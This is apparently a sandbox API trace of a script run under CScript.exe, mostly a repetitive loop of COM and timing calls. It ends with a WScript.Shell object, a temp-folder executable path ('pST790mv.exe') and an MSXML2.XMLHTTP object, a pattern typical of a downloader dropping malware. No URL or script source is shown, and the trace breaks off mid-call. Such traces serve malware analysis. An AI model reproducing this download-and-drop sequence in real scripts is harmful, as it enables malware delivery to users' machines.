IUnknown:Release (This=0x371480) returned 0x1 [0015.448] GetTickCount () returned 0x13ba8 [0015.451] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.471] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.474] MulDiv (nNumber=28092, nNumerator=100, nDenominator=182313) returned 15 [0015.474] IUnknown:Release (This=0x371480) returned 0x1 [0015.474] GetTickCount () returned 0x13bc7 [0015.477] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.565] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.589] MulDiv (nNumber=56178, nNumerator=100, nDenominator=219836) returned 26 [0015.589] IUnknown:Release (This=0x371480) returned 0x1 [0015.589] GetTickCount () returned 0x13c34 [0015.593] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.710] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.731] MulDiv (nNumber=56178, nNumerator=100, nDenominator=229273) returned 25 [0015.731] IUnknown:Release (This=0x371480) returned 0x1 [0015.731] GetTickCount () returned 0x13cc1 [0015.734] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.797] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.817] MulDiv (nNumber=56178, nNumerator=100, nDenominator=238710) returned 24 [0015.817] IUnknown:Release (This=0x371480) returned 0x1 [0015.817] GetTickCount () returned 0x13d1e [0015.820] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.883] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.904] MulDiv (nNumber=56178, nNumerator=100, nDenominator=248147) returned 23 [0015.904] IUnknown:Release (This=0x371480) returned 0x1 [0015.904] GetTickCount () returned 0x13d6c [0015.908] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.969] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.988] MulDiv (nNumber=56178, nNumerator=100, nDenominator=257584) returned 22 [0015.988] IUnknown:Release (This=0x371480) returned 0x1 [0015.988] GetTickCount () returned 0x13dca [0015.992] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.040] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.055] MulDiv (nNumber=56178, nNumerator=100, nDenominator=267021) returned 21 [0016.056] IUnknown:Release (This=0x371480) returned 0x1 [0016.056] GetTickCount () returned 0x13e08 [0016.059] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.107] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.124] MulDiv (nNumber=56178, nNumerator=100, nDenominator=276458) returned 20 [0016.124] IUnknown:Release (This=0x371480) returned 0x1 [0016.124] GetTickCount () returned 0x13e47 [0016.127] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.176] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.190] MulDiv (nNumber=56178, nNumerator=100, nDenominator=285895) returned 20 [0016.190] IUnknown:Release (This=0x371480) returned 0x1 [0016.190] GetTickCount () returned 0x13e95 [0016.193] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.243] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.257] MulDiv (nNumber=56178, nNumerator=100, nDenominator=295332) returned 19 [0016.258] IUnknown:Release (This=0x371480) returned 0x1 [0016.258] GetTickCount () returned 0x13ed3 [0016.262] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.318] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.333] MulDiv (nNumber=56178, nNumerator=100, nDenominator=304769) returned 18 [0016.333] IUnknown:Release (This=0x371480) returned 0x1 [0016.333] GetTickCount () returned 0x13f21 [0016.337] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.386] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.406] MulDiv (nNumber=56178, nNumerator=100, nDenominator=314206) returned 18 [0016.407] IUnknown:Release (This=0x371480) returned 0x1 [0016.407] GetTickCount () returned 0x13f60 [0016.412] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.465] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.479] MulDiv (nNumber=56178, nNumerator=100, nDenominator=323643) returned 17 [0016.479] IUnknown:Release (This=0x371480) returned 0x1 [0016.479] GetTickCount () returned 0x13fae [0016.484] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.534] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.549] MulDiv (nNumber=56178, nNumerator=100, nDenominator=333080) returned 17 [0016.549] IUnknown:Release (This=0x371480) returned 0x1 [0016.549] GetTickCount () returned 0x13ffc [0016.554] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.605] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.619] MulDiv (nNumber=56178, nNumerator=100, nDenominator=342517) returned 16 [0016.619] IUnknown:Release (This=0x371480) returned 0x1 [0016.619] GetTickCount () returned 0x1403a [0016.624] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.680] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.695] MulDiv (nNumber=56178, nNumerator=100, nDenominator=351954) returned 16 [0016.695] IUnknown:Release (This=0x371480) returned 0x1 [0016.695] GetTickCount () returned 0x14088 [0016.700] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.758] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.772] MulDiv (nNumber=56178, nNumerator=100, nDenominator=361391) returned 16 [0016.772] IUnknown:Release (This=0x371480) returned 0x1 [0016.772] GetTickCount () returned 0x140d6 [0016.778] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.837] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0016.860] MulDiv (nNumber=56178, nNumerator=100, nDenominator=370828) returned 15 [0016.860] IUnknown:Release (This=0x371480) returned 0x1 [0016.860] GetTickCount () returned 0x14134 [0016.866] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0017.063] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0017.104] MulDiv (nNumber=112350, nNumerator=100, nDenominator=445799) returned 25 [0017.104] IUnknown:Release (This=0x371480) returned 0x1 [0017.104] GetTickCount () returned 0x1421e [0017.110] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0017.222] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0017.263] MulDiv (nNumber=112350, nNumerator=100, nDenominator=464598) returned 24 [0017.263] IUnknown:Release (This=0x371480) returned 0x1 [0017.263] GetTickCount () returned 0x142ba [0017.270] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0017.390] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0017.432] MulDiv (nNumber=112350, nNumerator=100, nDenominator=483397) returned 23 [0017.432] IUnknown:Release (This=0x371480) returned 0x1 [0017.432] GetTickCount () returned 0x14365 [0017.439] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0017.570] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0017.608] MulDiv (nNumber=112350, nNumerator=100, nDenominator=502196) returned 22 [0017.608] IUnknown:Release (This=0x371480) returned 0x1 [0017.608] GetTickCount () returned 0x14411 [0017.616] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0017.799] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0017.854] MulDiv (nNumber=112350, nNumerator=100, nDenominator=520995) returned 22 [0017.854] IUnknown:Release (This=0x371480) returned 0x1 [0017.854] GetTickCount () returned 0x1450a [0017.864] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0017.989] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0018.028] MulDiv (nNumber=112350, nNumerator=100, nDenominator=539794) returned 21 [0018.028] IUnknown:Release (This=0x371480) returned 0x1 [0018.028] GetTickCount () returned 0x145b6 [0018.039] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0018.103] GetTickCount () returned 0x14604 [0018.111] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ac28 | out: ppv=0x18ac28*=0x371480) returned 0x0 [0018.135] GetTickCount () returned 0x14623 [0018.144] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ac28 | out: ppv=0x18ac28*=0x371480) returned 0x0 [0018.146] IUnknown:Release (This=0x371480) returned 0x1 [0018.146] GetTickCount () returned 0x14633 [0018.158] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ac28 | out: ppv=0x18ac28*=0x371480) returned 0x0 [0018.161] GetTickCount () returned 0x14642 [0018.170] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ac28 | out: ppv=0x18ac28*=0x371480) returned 0x0 [0018.179] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefe570000 [0018.179] GetProcAddress (hModule=0x7fefe570000, lpProcName="CLSIDFromProgIDEx") returned 0x7fefe58a4c4 [0018.179] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x18c920 | out: lpclsid=0x18c920*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0018.180] SysStringLen (param_1=0x0) returned 0x0 [0018.180] GetProcAddress (hModule=0x7fefe570000, lpProcName="CoGetClassObject") returned 0x7fefe5a2e18 [0018.180] CoGetClassObject (rclsid=0x18c920*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef3086300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c8f0) [0018.225] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18abc0 | out: lpSystemTimeAsFileTime=0x18abc0*(dwLowDateTime=0x5075280, dwHighDateTime=0x1d357fe)) [0018.225] GetCurrentProcessId () returned 0x9a8 [0018.225] GetCurrentThreadId () returned 0x9ac [0018.225] GetTickCount () returned 0x14681 [0018.225] QueryPerformanceCounter (in: lpPerformanceCount=0x18abc8 | out: lpPerformanceCount=0x18abc8*=318510938) returned 1 [0018.225] GetVersionExA (in: lpVersionInformation=0x18a9a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xf7402dc8, dwBuildNumber=0x7fe, dwPlatformId=0xf73f0000, szCSDVersion="þ\x07") | out: lpVersionInformation=0x18a9a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0018.225] GetUserDefaultLCID () returned 0x409 [0018.225] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18c720, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f [0018.225] lstrlenA (lpString="\\wscript.exe") returned 12 [0018.225] lstrlenA (lpString="C:\\Windows\\System32\\CScript.exe") returned 31 [0018.225] _strcmpi (_Str1="\\CScript.exe", _Str2="\\wscript.exe") returned -20 [0018.225] _strcmpi (_Str1="\\CScript.exe", _Str2="\\cscript.exe") returned 0 [0018.226] GetModuleHandleA (lpModuleName=0x0) returned 0xffa20000 [0018.226] GetProcAddress (hModule=0xffa20000, lpProcName=0x1) returned 0xffa21a60 [0018.227] LoadRegTypeLib (in: rguid=0x7fef7402df0*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x18c820*=0x18afb8 | out: pptlib=0x18c820*=0x5700c80) returned 0x0 [0018.234] ITypeLib:GetTypeInfoOfGuid (in: This=0x5700c80, GUID=0x7fef7402c30*(Data1=0x41904400, Data2=0xbe18, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x8b, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x18c868 | out: ppTInfo=0x18c868*=0x383d488) returned 0x0 [0018.234] ITypeInfo:GetRefTypeOfImplType (in: This=0x383d488, index=0xffffffff, pRefType=0x18c858 | out: pRefType=0x18c858*=0xfffffffe) returned 0x0 [0018.234] ITypeInfo:GetRefTypeInfo (in: This=0x383d488, hreftype=0xfffffffe, ppTInfo=0x7fef740c128 | out: ppTInfo=0x7fef740c128*=0x383d4e0) returned 0x0 [0018.234] IUnknown:Release (This=0x383d488) returned 0x1 [0018.234] IUnknown:Release (This=0x5700c80) returned 0x1 [0018.234] IUnknown:AddRef (This=0x383d4e0) returned 0x2 [0018.234] ITypeInfo:LocalGetIDsOfNames (This=0x383d4e0) returned 0x0 [0018.234] IUnknown:Release (This=0x383d4e0) returned 0x1 [0018.234] ITypeInfo:LocalInvoke (This=0x383d4e0) returned 0x0 [0018.234] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%/pST790mv.exe", lpDst=0x18b240, nSize=0x400 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/pST790mv.exe") returned 0x32 [0018.234] IUnknown:Release (This=0x383d4e0) returned 0x1 [0018.235] CLSIDFromProgIDEx (in: lpszProgID="MSXML2.XMLHTTP", lpclsid=0x18c920 | out: lpclsid=0x18c920*(Data1=0xf6d90f16, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4))) returned 0x0 [0018.236] SysStringLen (param_1=0x0) returned 0x0 [0018.236] CoGetClassObject (in: rclsid=0x18c920*(Data1=0xf6d90f16, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef3086300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c8f0 | out: ppv=0x18c8f0*=0x7fef375ac40) returned 0x0 [0018.313] XMLHTTP:IUnknown:QueryInterface (in: This=0x7fef375ac40, riid=0x7fef3086310*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18c8f8 | out: ppvObject=0x18c8f8*=0x0) returned 0x80004002 [0018.313] XMLHTTP:IClassFactory:CreateInstance (in: This=0x7fef375ac40, pUnkOuter=0x0, riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18c8e0 | out: ppvObject=0x18c8e0*=0x58e5aa0) returned 0x0 [0018.317] XMLHTTP:IUnknown:AddRef (This=0x7fef375ac40) returned 0x1 [0018.317] IUnknown:QueryInterface (in: This=0x58e5aa0, riid=0x7fef3086320*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x18c8c0 | out: ppvObject=0x18c8c0*=0x58e5b08) returned 0x0 [0018.317] IObjectWithSite:SetSite (This=0x58e5b08, pUnkSite=0x495c80) returned 0x0 [0018.318] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fefe71d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18c638 | out: ppvObject=0x18c638*=0x0) returned 0x80004002 [0018.318] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fefe6f6f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, 